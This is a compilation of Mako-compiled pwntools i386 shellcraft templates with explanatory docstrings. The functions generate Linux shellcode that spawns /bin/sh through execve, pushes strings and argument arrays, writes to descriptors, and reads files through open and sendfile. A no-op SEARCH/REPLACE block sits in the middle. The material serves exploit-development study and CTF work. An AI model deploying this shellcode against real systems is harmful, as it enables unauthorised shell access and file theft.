def render_body(context, **pageargs):
    """Render the i386 Linux ``sh`` shellcraft template (Mako-compiled module code).

    Writes, through the Mako context's writer, i386 assembly that pushes the
    string ``'/bin///sh'`` onto the stack and then requests
    ``execve(esp, 0, 0)`` via ``i386.linux.syscall``.  From a detection point
    of view the emitted bytes therefore carry the padded path literal followed
    by an execve syscall stub.  The module targets Python 2 (``unicode``,
    ``u''`` literals).

    Args:
        context: Mako render context; supplies ``writer()`` and the
            ``caller_stack`` frame bookkeeping.
        **pageargs: Extra template arguments; recorded in the template-local
            namespace but otherwise unused here.

    Returns:
        ``''`` -- Mako render bodies always return the empty string; the
        rendered text goes to ``context.writer()``.
    """
    # Mako wraps every render body in a caller frame; the handle itself is
    # unused, but the frame must be popped on every exit path (see finally).
    __M_caller = context.caller_stack._push_frame()
    try:
        # Template-local namespace, seeded with the page arguments.
        __M_locals = __M_dict_builtin(pageargs=pageargs)
        __M_writer = context.writer()
        from pwnlib.shellcraft import i386
        # Mako bookkeeping: mirror the names bound by a template <% %> block
        # into __M_locals.  __M_locals_builtin is presumably the ``locals``
        # builtin captured by the module prelude (not visible here).
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['i386'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        # SYS_execve is imported only so the template namespace exposes it; the
        # syscall below is requested by name ('SYS_execve'), not via this
        # constant.
        from pwnlib.constants.linux.i386 import SYS_execve
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['SYS_execve'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        __M_writer(u'\n\n')
        # Push the path string so that esp points at it.  (pushstr presumably
        # NUL-terminates by default -- cf. the append_null=False call in the
        # write template -- confirm against pwnlib.shellcraft.i386.)
        __M_writer(unicode(i386.pushstr('/bin///sh')))
        __M_writer(u'\n\n')
        # execve(path=esp, argv=0, envp=0)
        __M_writer(unicode(i386.linux.syscall('SYS_execve', 'esp', 0, 0)))
        __M_writer(u'\n')
        return ''
    finally:
        context.caller_stack._pop_frame()
def render_body(context, string, sock='ebp', **pageargs):
    """Render the i386 Linux ``write`` shellcraft template (Mako-compiled).

    Pushes ``string`` onto the stack *without* a trailing NUL
    (``append_null=False``) and then requests ``write(sock, esp, len(string))``
    via ``i386.linux.syscall``.  The byte count is computed at render time from
    the Python string, so the emitted code contains a fixed-length write.

    Args:
        context: Mako render context (``writer()``, ``caller_stack``, and the
            builtins the template resolves through ``context.get``).
        string: Data to write; must support ``len()`` and be acceptable to
            ``i386.pushstr``.
        sock: File descriptor argument for ``write``; a register name by
            default (``'ebp'``), but anything ``i386.linux.syscall`` accepts.
        **pageargs: Extra template arguments, recorded but unused here.

    Returns:
        ``''``; the rendered text goes to ``context.writer()``.
    """
    # Mako caller-frame bookkeeping; popped in the finally clause.
    __M_caller = context.caller_stack._push_frame()
    try:
        # Template-local namespace seeded with the arguments.
        __M_locals = __M_dict_builtin(pageargs=pageargs, sock=sock, string=string)
        # Mako resolves builtins through the render context (UNDEFINED when
        # absent); this shadows the real ``len`` for the rest of the body.
        len = context.get('len', UNDEFINED)
        __M_writer = context.writer()
        from pwnlib.shellcraft import i386
        # Mako bookkeeping: mirror names bound by a <% %> block into
        # __M_locals (__M_locals_builtin is presumably ``locals``; its
        # definition is in the module prelude, outside this listing).
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['i386'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        # Imported to expose the constant in the template namespace; the
        # syscall below is requested by name ('SYS_write').
        from pwnlib.constants.linux.i386 import SYS_write
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['SYS_write'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        __M_writer(u'\n')
        __M_writer(u'\n\n')
        # No NUL terminator: the exact byte length is passed to write() below.
        __M_writer(unicode(i386.pushstr(string, append_null=False)))
        __M_writer(u'\n')
        # write(fd=sock, buf=esp, count=len(string))
        __M_writer(unicode(i386.linux.syscall('SYS_write', sock, 'esp', len(string))))
        __M_writer(u'\n')
        return ''
    finally:
        context.caller_stack._pop_frame()
def render_body(context, value, **pageargs):
    """Render the i386 ``push`` shellcraft template (Mako-compiled).

    Emits a stack push of ``value``.  Integers (``int``/``long`` -- this is
    Python 2 code) are packed as a 32-bit little-endian word and pushed through
    ``i386.pushstr``; the first line of pushstr's output is stripped with
    ``re.sub`` and replaced by a ``/* push <repr(value)> */`` comment.  Any
    other value is emitted verbatim as ``push <value>`` (e.g. a register name
    or an assembler expression).

    Args:
        context: Mako render context (``writer()``, ``caller_stack``, and the
            builtins resolved through ``context.get``).
        value: Integer to pack and push, or any object whose ``unicode()``
            form is a valid ``push`` operand.
        **pageargs: Extra template arguments, recorded but unused here.

    Returns:
        ``''``; the rendered text goes to ``context.writer()``.
    """
    # Mako caller-frame bookkeeping; popped in the finally clause.
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(pageargs=pageargs, value=value)
        # Mako resolves builtins through the render context; these shadow the
        # real builtins for the rest of the body.  ``long`` only exists on
        # Python 2.
        int = context.get('int', UNDEFINED)
        isinstance = context.get('isinstance', UNDEFINED)
        repr = context.get('repr', UNDEFINED)
        long = context.get('long', UNDEFINED)
        __M_writer = context.writer()
        from pwnlib.util import packing
        # Mako bookkeeping: mirror names bound by each <% %> block into
        # __M_locals (__M_locals_builtin is presumably ``locals``).
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['packing'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        from pwnlib.shellcraft import i386
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['i386'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        import re
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['re'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        __M_writer(u'\n')
        __M_writer(u'\n\n')
        if isinstance(value, (int, long)):
            # Integer: annotate with the original value, then push its
            # 32-bit little-endian encoding.
            __M_writer(u' /* push ')
            __M_writer(unicode(repr(value)))
            __M_writer(u' */\n ')
            # pack(value, 32, 'little', True): the trailing True presumably
            # selects signed packing -- confirm against pwnlib.util.packing.
            # The second positional argument to pushstr (False) presumably
            # disables the appended NUL (cf. append_null=False elsewhere).
            # re.sub drops the first line of pushstr's output when it starts
            # with '/' (presumably pushstr's own comment line), count=1.
            __M_writer(unicode(re.sub(r'^\s*/.*\n', '', i386.pushstr(packing.pack(value, 32, 'little', True), False), 1)))
            __M_writer(u'\n')
        else:
            # Non-integer: emit the operand verbatim; no validation is done on
            # the text, so the caller is responsible for passing a sane operand.
            __M_writer(u' push ')
            __M_writer(unicode(value))
            __M_writer(u'\n')
        return ''
    finally:
        context.caller_stack._pop_frame()
<<<<<<< SEARCH
def render_body(context, filename, fd=1, **pageargs):
    """Render the i386 Linux ``cat``-style (sendfile) shellcraft template.

    Pushes ``filename`` onto the stack, opens it read-only via ``SYS_open``,
    and then requests ``sendfile(fd, eax, 0, 0x7fffffff)`` so that the opened
    file (descriptor in ``eax``, the return value of open) is copied to ``fd``
    in one call with a very large count.

    Args:
        context: Mako render context (``writer()``, ``caller_stack``).
        filename: Path string to open; passed to ``i386.pushstr``.
        fd: Output descriptor for sendfile; defaults to ``1`` (stdout).
        **pageargs: Extra template arguments, recorded but unused here.

    Returns:
        ``''``; the rendered text goes to ``context.writer()``.
    """
    # Mako caller-frame bookkeeping; popped in the finally clause.
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(pageargs=pageargs, fd=fd, filename=filename)
        __M_writer = context.writer()
        from pwnlib.shellcraft import i386
        from pwnlib.shellcraft import common
        # Mako bookkeeping: mirror names bound by each <% %> block into
        # __M_locals (__M_locals_builtin is presumably ``locals``).
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['i386', 'common'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        __M_writer(u'\n')
        __M_writer(u'\n')
        # A unique label is allocated but never referenced in the text emitted
        # below; it appears to be a leftover from a looping variant of this
        # template.  Kept because it is exported into the template namespace.
        label = common.label("sendfile_loop")
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['label'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n\n ')
        __M_writer(unicode(i386.pushstr(filename)))
        __M_writer(u'\n ')
        # open(pathname=esp, flags=0, mode='O_RDONLY').  Note the argument
        # order: the numeric 0 lands in the flags word and the symbolic
        # O_RDONLY in the mode argument.  On Linux O_RDONLY is 0, so the
        # resulting call is the same as open(esp, O_RDONLY, 0) -- but the
        # order looks transposed relative to open(2); worth confirming in the
        # source template.
        __M_writer(unicode(i386.syscall('SYS_open', 'esp', 0, 'O_RDONLY')))
        __M_writer(u'\n ')
        # sendfile(out_fd=fd, in_fd=eax, offset=NULL, count=0x7fffffff):
        # eax holds the descriptor returned by the open above.
        __M_writer(unicode(i386.syscall('SYS_sendfile', fd, 'eax', 0, 0x7fffffff)))
        __M_writer(u'\n')
        return ''
    finally:
        context.caller_stack._pop_frame()
=======
def render_body(context, filename, fd=1, **pageargs):
    """Render the i386 Linux ``cat``-style (sendfile) shellcraft template.

    Pushes ``filename`` onto the stack, opens it read-only via ``SYS_open``,
    and then requests ``sendfile(fd, eax, 0, 0x7fffffff)`` so that the opened
    file (descriptor in ``eax``, the return value of open) is copied to ``fd``
    in one call with a very large count.

    Args:
        context: Mako render context (``writer()``, ``caller_stack``).
        filename: Path string to open; passed to ``i386.pushstr``.
        fd: Output descriptor for sendfile; defaults to ``1`` (stdout).
        **pageargs: Extra template arguments, recorded but unused here.

    Returns:
        ``''``; the rendered text goes to ``context.writer()``.
    """
    # Mako caller-frame bookkeeping; popped in the finally clause.
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(pageargs=pageargs, fd=fd, filename=filename)
        __M_writer = context.writer()
        from pwnlib.shellcraft import i386
        from pwnlib.shellcraft import common
        # Mako bookkeeping: mirror names bound by each <% %> block into
        # __M_locals (__M_locals_builtin is presumably ``locals``).
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['i386', 'common'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        __M_writer(u'\n')
        __M_writer(u'\n')
        # A unique label is allocated but never referenced in the text emitted
        # below; it appears to be a leftover from a looping variant of this
        # template.  Kept because it is exported into the template namespace.
        label = common.label("sendfile_loop")
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['label'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n\n ')
        __M_writer(unicode(i386.pushstr(filename)))
        __M_writer(u'\n ')
        # open(pathname=esp, flags=0, mode='O_RDONLY').  Note the argument
        # order: the numeric 0 lands in the flags word and the symbolic
        # O_RDONLY in the mode argument.  On Linux O_RDONLY is 0, so the
        # resulting call is the same as open(esp, O_RDONLY, 0) -- but the
        # order looks transposed relative to open(2); worth confirming in the
        # source template.
        __M_writer(unicode(i386.syscall('SYS_open', 'esp', 0, 'O_RDONLY')))
        __M_writer(u'\n ')
        # sendfile(out_fd=fd, in_fd=eax, offset=NULL, count=0x7fffffff):
        # eax holds the descriptor returned by the open above.
        __M_writer(unicode(i386.syscall('SYS_sendfile', fd, 'eax', 0, 0x7fffffff)))
        __M_writer(u'\n')
        return ''
    finally:
        context.caller_stack._pop_frame()
>>>>>>> REPLACE
def render_body(context, **pageargs):
    """Render a hand-written i386 Linux ``sh`` shellcraft template (Mako-compiled).

    Unlike the generic execve template, most of the assembly here is a fixed
    string literal: it zeroes ``eax``, pushes a NULL word, pushes
    ``'/bin//sh'`` via ``i386.pushstr``, copies ``esp`` into ``ecx``, performs
    a series of pushes, loads ``SYS_execve`` into ``al`` and executes
    ``int 0x80``.  The fixed literal makes the emitted text a stable static
    signature.

    Args:
        context: Mako render context (``writer()``, ``caller_stack``).
        **pageargs: Extra template arguments, recorded but unused here.

    Returns:
        ``''``; the rendered text goes to ``context.writer()``.
    """
    # Mako caller-frame bookkeeping; popped in the finally clause.
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(pageargs=pageargs)
        __M_writer = context.writer()
        from pwnlib.shellcraft import i386
        # Mako bookkeeping: mirror names bound by a <% %> block into
        # __M_locals (__M_locals_builtin is presumably ``locals``).
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['i386'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        # NOTE(review): the literal's comment says eax, ecx and edx are
        # cleared, but only ``xor eax, eax`` is emitted here; ecx is written
        # by the ``mov ecx, esp`` below and edx is not touched in the visible
        # text -- confirm against the source .asm template.
        __M_writer(u"\n\n\n /* Clear eax, ecx, edx */\n xor eax, eax\n push eax\n\n /* Push '/bin//sh' */\n")
        __M_writer(unicode(i386.pushstr("/bin//sh")))
        # NOTE(review): the int 0x80 convention passes arguments in
        # ebx/ecx/edx; the visible text only sets ecx and al before the trap.
        # Whether the preceding pushes are meant to feed those registers is
        # not determinable from this listing -- confirm in the source template.
        __M_writer(u'\n mov ecx, esp\n\n /* execve("/bin//sh", {junk, 0}, {0}); */\n push eax\n push esp\n push esp\n push ecx\n push eax\n mov al, SYS_execve\n int 0x80\n\n')
        return ''
    finally:
        context.caller_stack._pop_frame()
def render_body(context, reg, array, **pageargs):
    """Render the i386 ``pushstr_array`` shellcraft template (Mako-compiled).

    Emits assembly that builds a NULL-terminated ``char *[]`` on the stack:
    all strings are concatenated (each with exactly one trailing NUL) and
    pushed as one blob, a NULL word is pushed as the array terminator, then a
    pointer to each string is computed relative to ``esp`` and pushed in
    reverse order.  On exit ``reg`` holds ``esp``, i.e. the address of the
    pointer array.

    Args:
        context: Mako render context (``writer()``, ``caller_stack``, and the
            builtins resolved through ``context.get``).
        reg: Scratch register name used to materialise each pointer; also
            receives the final array address.
        array: A single string or a list of strings (Python 2 ``str``).
        **pageargs: Extra template arguments, recorded but unused here.

    Returns:
        ``''``; the rendered text goes to ``context.writer()``.
    """
    # Mako caller-frame bookkeeping; popped in the finally clause.
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(array=array, reg=reg, pageargs=pageargs)
        # Mako resolves builtins through the render context; these shadow the
        # real builtins for the rest of the body.
        reversed = context.get('reversed', UNDEFINED)
        repr = context.get('repr', UNDEFINED)
        len = context.get('len', UNDEFINED)
        str = context.get('str', UNDEFINED)
        enumerate = context.get('enumerate', UNDEFINED)
        isinstance = context.get('isinstance', UNDEFINED)
        __M_writer = context.writer()
        from pwnlib.shellcraft import i386
        # Mako bookkeeping: mirror names bound by each <% %> block into
        # __M_locals (__M_locals_builtin is presumably ``locals``).
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['i386'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        __M_writer(u'\n')
        __M_writer(u'\n')
        # A bare string is treated as a one-element array.
        if isinstance(array, (str)):
            array = [array]
        array_str = ''
        # Normalize all of the arguments' endings: strip any existing NULs and
        # append exactly one, so each element is NUL-terminated once.
        array = [arg.rstrip('\x00') + '\x00' for arg in array]
        array_str = ''.join(array)
        word_size = 4
        # Displacement bookkeeping: starts past the whole string blob plus the
        # NULL terminator word pushed below, and shrinks by each string's
        # length as pointers are pushed.
        offset = len(array_str) + word_size
        # 'arg' is listed because Python 2 list comprehensions leak their loop
        # variable into the enclosing scope (presumably why Mako captured it).
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['word_size', 'array', 'offset', 'array_str', 'arg'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u' /* push argument array ')
        __M_writer(unicode(repr(array)))
        __M_writer(u' */\n ')
        # Push the concatenated strings as one blob.
        __M_writer(unicode(i386.pushstr(array_str)))
        __M_writer(u'\n ')
        # reg = 0; push reg  -> the NULL that terminates the pointer array.
        __M_writer(unicode(i386.mov(reg, 0)))
        __M_writer(u'\n push ')
        __M_writer(unicode(reg))
        __M_writer(u' /* null terminate */\n')
        # Pointers are pushed last-element first so the array reads in order
        # from esp upwards.  For the i-th push, word_size * i accounts for the
        # pointer words already pushed; offset - len(arg) is the string's start
        # within the blob.  The value is added to esp to form an absolute
        # pointer, which is then pushed.
        for i, arg in enumerate(reversed(array)):
            __M_writer(u' ')
            __M_writer(unicode(i386.mov(reg, offset + word_size * i - len(arg))))
            __M_writer(u'\n add ')
            __M_writer(unicode(reg))
            __M_writer(u', esp\n push ')
            __M_writer(unicode(reg))
            __M_writer(u' /* ')
            __M_writer(unicode(repr(arg)))
            __M_writer(u' */\n ')
            offset -= len(arg)
            # Mako bookkeeping for the <% offset -= ... %> block inside the loop.
            __M_locals_builtin_stored = __M_locals_builtin()
            __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['offset'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u' ')
        # Leave the address of the pointer array (current esp) in reg.
        __M_writer(unicode(i386.mov(reg, 'esp')))
        __M_writer(u'\n')
        return ''
    finally:
        context.caller_stack._pop_frame()
def render_body(context,path='/bin///sh',argv=0,envp=0,**pageargs):
    """Render the generic i386 Linux ``execve`` shellcraft template (Mako-compiled).

    Marshals the three execve arguments and then emits
    ``i386.syscall('SYS_execve', path, argv, envp)``:

    * ``envp`` given as a dict is first flattened to ``'KEY=VALUE'`` strings.
    * ``argv``/``envp`` given as a list or tuple are pushed with
      ``i386.pushstr_array`` into a scratch register taken from
      ``abi.register_arguments`` and replaced by that register name.
    * ``path`` given as a string that is not a register name is pushed onto
      the stack and replaced by ``'esp'``.

    Anything else (an integer such as the default ``0``, or a register name)
    is passed through to ``i386.syscall`` unchanged.

    Args:
        context: Mako render context (``writer()``, ``caller_stack``, and the
            builtins resolved through ``context.get``).
        path: Program path string, register name, or immediate.
        argv: ``0``, a register name, or a list/tuple of strings.
        envp: ``0``, a register name, a list/tuple of strings, or a dict
            mapping names to values.
        **pageargs: Extra template arguments, recorded but unused here.

    Returns:
        ``''``; the rendered text goes to ``context.writer()``.
    """
    # Mako caller-frame bookkeeping; popped in the finally clause.
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(path=path,pageargs=pageargs,envp=envp,argv=argv)
        # Mako resolves builtins through the render context; these shadow the
        # real builtins for the rest of the body.
        dict = context.get('dict', UNDEFINED)
        isinstance = context.get('isinstance', UNDEFINED)
        list = context.get('list', UNDEFINED)
        str = context.get('str', UNDEFINED)
        tuple = context.get('tuple', UNDEFINED)
        __M_writer = context.writer()
        from pwnlib.shellcraft import i386, registers
        from pwnlib.abi import linux_i386_syscall as abi
        # Mako bookkeeping: mirror names bound by each <% %> block into
        # __M_locals (__M_locals_builtin is presumably ``locals``).
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['abi','i386','registers'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        __M_writer(u'\n')
        __M_writer(u'\n')
        # A dict environment becomes a list of 'KEY=VALUE' strings; no
        # validation of keys/values is performed here.
        if isinstance(envp, dict):
            envp = ['%s=%s' % (k,v) for (k,v) in envp.items()]
        # 'k' and 'v' are captured because Python 2 comprehensions leak their
        # loop variables; the membership filter skips them when the branch
        # above did not run.
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['k','envp','v'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        # Which concrete registers register_arguments[3] / [2] denote is
        # defined in pwnlib.abi, not visible here; i386.syscall below is
        # presumably responsible for moving them into execve's argument
        # registers.
        if isinstance(argv, (list, tuple)):
            __M_writer(u' ')
            __M_writer(unicode(i386.pushstr_array(abi.register_arguments[3], argv)))
            __M_writer(u'\n ')
            argv = abi.register_arguments[3]
            __M_locals_builtin_stored = __M_locals_builtin()
            __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['argv'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        if isinstance(envp, (list, tuple)):
            __M_writer(u' ')
            __M_writer(unicode(i386.pushstr_array(abi.register_arguments[2], envp)))
            __M_writer(u'\n ')
            envp = abi.register_arguments[2]
            __M_locals_builtin_stored = __M_locals_builtin()
            __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['envp'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        # A literal path string is pushed onto the stack and referenced via
        # esp; a register name is used as-is.
        if isinstance(path, str) and not registers.is_register(path):
            __M_writer(u' ')
            __M_writer(unicode(i386.pushstr(path)))
            __M_writer(u'\n ')
            path = 'esp'
            __M_locals_builtin_stored = __M_locals_builtin()
            __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['path'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        __M_writer(u' ')
        # execve(path, argv, envp) with whatever operands the branches above left.
        __M_writer(unicode(i386.syscall('SYS_execve', path, argv, envp)))
        __M_writer(u'\n')
        return ''
    finally:
        context.caller_stack._pop_frame()